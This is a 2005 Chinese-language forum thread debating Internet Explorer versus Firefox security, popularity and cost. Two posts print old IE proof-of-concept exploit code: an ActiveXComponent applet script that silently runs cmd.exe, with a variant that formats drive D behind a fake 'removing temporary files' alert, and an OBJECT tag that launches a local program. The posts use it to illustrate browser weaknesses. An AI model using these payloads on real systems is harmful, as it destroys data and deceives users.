15楼#
发布于:2005-06-06 15:44
效率和性能方面,要靠实际事实说话,而不是理论。至于说 FF 下载量是有几千万,但下载量和用户人数无直接关系。FF 每次更新现有用户大都会更新吧?下载量当然会上升了。如果 IE 每次补丁都推出新版本给用户下载,IE 的下载量相信比全球人口还要高。 使用的人多,出现问题的机会较高,这是常理。当然 FF 可能像 apache 那样打破常理,但 FF 未到那阶段,猜测争论是无谓的,如果 FF 的使用量能与 IE 相约,到时自有分晓。 |
|
|
16楼#
发布于:2005-06-06 15:44
|
|
|
17楼#
发布于:2005-06-06 15:44
某些人有被害妄想症,看到不合自己胃口的文章,你可以驳斥,但也别动不动扯到“枪手”,这已经涉及到人身伤害了。
|
|
18楼#
发布于:2005-06-06 15:44
Re: 感谢各位批评
PS:回复hh9527,与FF无关,大家请略过
hh9527:感谢各位批评,因为批评的话也要先阅读,各位阅读了,自然我“只顾眼球(人气)利益”的不良企图的就已经实现了1.我认为枪手文和枪手不能绝对直接划等号 注意:我说的是王翌搞过准枪手文,如果我认为他是真正的枪手没必要再加"准" "王翌是不是枪手?":我没说他是,只是说他写过准枪手文 他的枪手?请指出我那帖哪里说了你是帮王翌放枪的? 2.那帖已修改,等待你的评论 |
|
|
19楼#
发布于:2005-06-06 15:44
很简单的回楼主以及abc@home一句
一套正版WinXp捆绑的IE6是多少钱? 一套Linux+Firefox是多少钱? |
|
20楼#
发布于:2005-06-06 15:44
Zene: 虽然我不喜欢用 IE,但这的确不是 IE 的错!因为基于 XPCOM 的 Firefox 同样会受到这样的困扰,3721 可以为 IE 做一个邪恶的 ActiveX,同样也可以为 Firefox 做类似的事情,这在技术上是一样的。你想象一下:如果你在使用了 Firefox 访问网页时,弹出 3721 安装的提示,然后利用 XPCOM,把你的系统搞的乱七八糟,你是不是也要骂 Firefox 呢?不要因为现在没有 3721 for Firefox 就认定 Firefox 有多么安全,因为技术上别说 3721 for Firefox,即使 AUTO-FORMAT for Firefox 都同样是可行的。 如果要真的说错,那么错的是大多数 Windows 用户的不安全做法:大多数 Windows 用户都是用 administrator 或类似权限的用户来做日常的事情,这本身赋予了他不安全的基础。在 UNIX 领域,这是不可想象的,你看见过一个 UNIX 的用户没事拿 root 用户在系统里搞来搞去么?如果这样的话,UNIX 也比 WINDOWS 安全不到哪里去。 浏览器里运行的 HTML / javscript 代码一般情况下都是在一个安全的沙箱里运行,不能访问本地资源,这是浏览器安全的基础。但这同样会使许多网络应用无法实现,所以浏览器会开一个后门,这就是 ActiveX 或者 XPCOM,只要用户许可了这个后门,它就可以突破浏览器的沙箱限制,在操作系统的权限内做任何事情。这一点来说 IE 和 Firefox 都一样,目前网络针对 Firefox 的恶意程序比较少,这是目前 Firefox 比 IE 更安全的一个原因,但这并不代表从技术上 Firefox 就比 IE 的机制更安全。机制的安全是指“不能做非法的事情”,而不是“不去做非法的事情”,否则浏览器的安全就只能靠 3721 这类产品的良心发现了。从这点上来说:所有提供能访问本地资源的扩展/插件的浏览器都是不安全的。这也是为什么 Firefox 和 IE 都要提供了插件的数字签名管理,确保用户知道他许可的扩展/插件是什么,然后让用户自己承担使用它的风险。 除此之外还有就是如果使用权限很低的用户(例如只有访问很少资源的权限)来浏览,也会改善浏览器的安全性:即使插件突破了浏览器沙箱的限制,还是会被操作系统限制在较为安全的环境中。 当然我所说的都是机制上的问题,而不是具体软件 BUG 的问题,我只是想说明:丛机制上来看,IE 和 Firefox 的安全性相当。至于软件 BUG 的问题,我想无论是 IE 和 Firefox 都有,关键看谁能快速反映修正这些 BUG。 |
|
21楼#
发布于:2005-06-06 15:44
这个ActiveX漏洞主要针对IE5.5(含)及其以下版本,对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来,就是把 com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记可能导致任意创建和解释执行ActiveX对象,从而可以创建任意文件,运行程序,写注册表。举个例子,在嵌入com.ms.activeX.ActiveXComponent对象后,在IE的默认安全级别“中”状态下,打开包含以下脚本的HTML文件也会运行一个命令提示符,但没有任何警告。甚至还可以使程序在后台运行,这就要“归功”于嵌入的 com.ms.activeX.ActiveXComponent对象了,正是它导演了这一幕!具体代码如下:
<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET> <SCRIPT> function runcmd() { a=document.applets[0]; a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); a.createInstance(); wsh=a.GetObject(); wsh.Run('cmd.exe');//改为"wsh.Run('cmd.exe',false,1);"则程序在后台隐藏运行 } setTimeout('runcmd()',10); </SCRIPT> 运行的结果会打开一个命令提示符,但整个运行过程中没有任何提示。如果你还没有意识到这有多么危险,那么请你注意了,如果我们把将上面的代码“wsh.Run('cmd.exe');”改为下面这两句(其它的不变): wsh.Run('start/m format.com d:/q/autotest/u'); alert('IMPORTANT : Windows is removing unused temporary files.'); 这样做的结果又会怎么样呢?呵呵,你的D盘要被格式化了!听到硬盘狂响,大多数人会以为Windows正在移除临时文件,因为屏幕上显示: IMPORTANT: Windows is removing unused temporary files.,其实这是个幌子,用来欺骗我们的!此时在后台进行的是格式化硬盘命令!等到发觉则悔之晚矣…… |
|
|
22楼#
发布于:2005-06-06 15:44
对于使用IE6.0的用户来说有个可怕的漏洞,该漏洞的存在导致可以在网页中执行任何程序,并可以绕过IE的ActiveX安全设置,即便你禁用ActiveX控件,网页中的恶意程序照样可以运行!举个例子,如果网页中含有下列代码,可以无声无息地执行你的记事本程序!想想看,如果这里不是记事本程序,换作其他的程序会怎么样?代码如下:
<body></body> <SCRIPT> html='<OBJECT CLASSID="CLSID:12345678" ' html+=' CODEBASE="c:/windows/notepad.exe"></OBJECT>'; /注意:上面的notepad.exe的路径请修改为你系统对应的路径document.body.innerHTML=html; </SCRIPT> 这个漏洞的主要原因是IE安全设置都是针对非本地的页面或交互的,对于本地的安全设置IE是最大信任的。如果你注意看IE的安全设置,都是对 Internet和Intranet上WEB服务器而言的,根本就没有对本地文件的安全设置。概括说来就是IE对本地安全采用最大信任原则。 |
|
|
23楼#
发布于:2005-06-06 15:44
这样说起来,什么都是假的,添加新功能才是真的,例如支持png、svg。
不过呢,对我来说新支持的那些格式很少有机会用到。现阶段,firefox简洁、优美、安全,这样的理由就足够了。 |
|
24楼#
发布于:2005-06-06 15:44
|
|
|
25楼#
发布于:2005-06-06 15:44
不小心用菜刀切到手指,也是菜刀的错?菜刀割手指不是错,但如果一把菜刀造的锋利无比,又不给你加一个刀套,这个割断手指不能说没菜刀的过吧?就像套套破了一样,你会怪谁?怪自己太用力,用了太久,量太多?电饭锅爆炸了,你难道怪自己?产品缺陷就是缺陷,没有什么好推脱的,IE是干啥?浏览网页的,自然就应该知道网上有什么东西而防止用户遭受损失! 我由96年开始上网,从未在 IE 感染过病毒那么多的恶意代码和莫名其妙的软件中国的网民恐怕谁都领教过吧!难道中国网民都有你这么好运和高计算机水平? 在我这里(winxp)裸体 FF 启用时间也比 IE 长一倍有多我这里没有说启动速度的事,IE不就是占了系统捆绑的光吗?找个没有IE的Win来比比看。 知不知 mozilla 产品有多少确认的 bug?总比IE好 事实上在不少测试中 gecko 的速度还不及 trident莫非是pcpop的评测,不过我只是奇怪,IE那为什么不写的快一点,难道这个也交给扩展去做? FF 下载量是有几千万,但下载量和用户人数无直接关系。这句话我赞成,不过不知道多少人是从官方网站上下的,多少人是从其他地方下载的。看看那个FX在欧洲的占有率吧。 |
|
26楼#
发布于:2005-06-06 15:44
viewtheard: 这个ActiveX漏洞主要针对IE5.5(含)及其以下版本,对OE、Outlook、Foxmail等也有着巨大的威胁。概况说来,就是把 com.ms.activeX.ActiveXComponent对象嵌入<APPLET>标记可能导致任意创建和解释执行ActiveX对象,从而可以创建任意文件,运行程序,写注册表。举个例子,在嵌入com.ms.activeX.ActiveXComponent对象后,在IE的默认安全级别“中”状态下,打开包含以下脚本的HTML文件也会运行一个命令提示符,但没有任何警告。甚至还可以使程序在后台运行,这就要“归功”于嵌入的 com.ms.activeX.ActiveXComponent对象了,正是它导演了这一幕!具体代码如下: 在 activex 的帖子已经说过,这里不重复了: [quote="abc@home"]... 针对 activex 漏洞是有,但早已堵塞。近年 IE 的漏洞主要都是源于 IE 对输入没有足够的验证,造成跨 security zones 操作,或是传统的 buffer overflow,造成任意执行代码的机会。 ... [/quote] 如果用户仍使用 IE 5.5,建议尽快升级到 IE 6.0 及打齐所有安全保丁(即使是 FF 用户,也会有需要使用 IE 的时候)。 |
|
|
27楼#
发布于:2005-06-06 15:44
谁更重要? 用IE中毒比例和可能性大还是Firefox?往下说又是软件设计架构的健康性问题了, 这个我相信你不是没听过的。 |
|
|
28楼#
发布于:2005-06-06 15:44
让正版用户升级浏览器显然是不明智的。IE 6.0的漏洞出现后如果MS只在IE7.0上修补的话。那么用户则必须跟着升级操作系统,那将会给用户造成很大经济负担的说。IE 6以下的版本的在不少中小企业仍在使用的情况
|
|
|
29楼#
发布于:2005-06-06 15:44
看看那个FX在欧洲的占有率吧。 这个占有率清楚的反衬了中国盗版市场深厚造成的恶果。 另外还有很重要的一点:国外的思想就是比较容易接受新事物, 拿ATI的X800来说,中国还是测评室写点文章来让大家yy的时候,法国 这边年轻人打CS就一窝蜂配上了X800,智能手机,等离子电视,都 很快的普及。 加上欧美电子货币的普及,大部分支付是通过信用卡在网络上进行的, 安全性的问题绝对让Firefox博得用户青睐。 |
|
|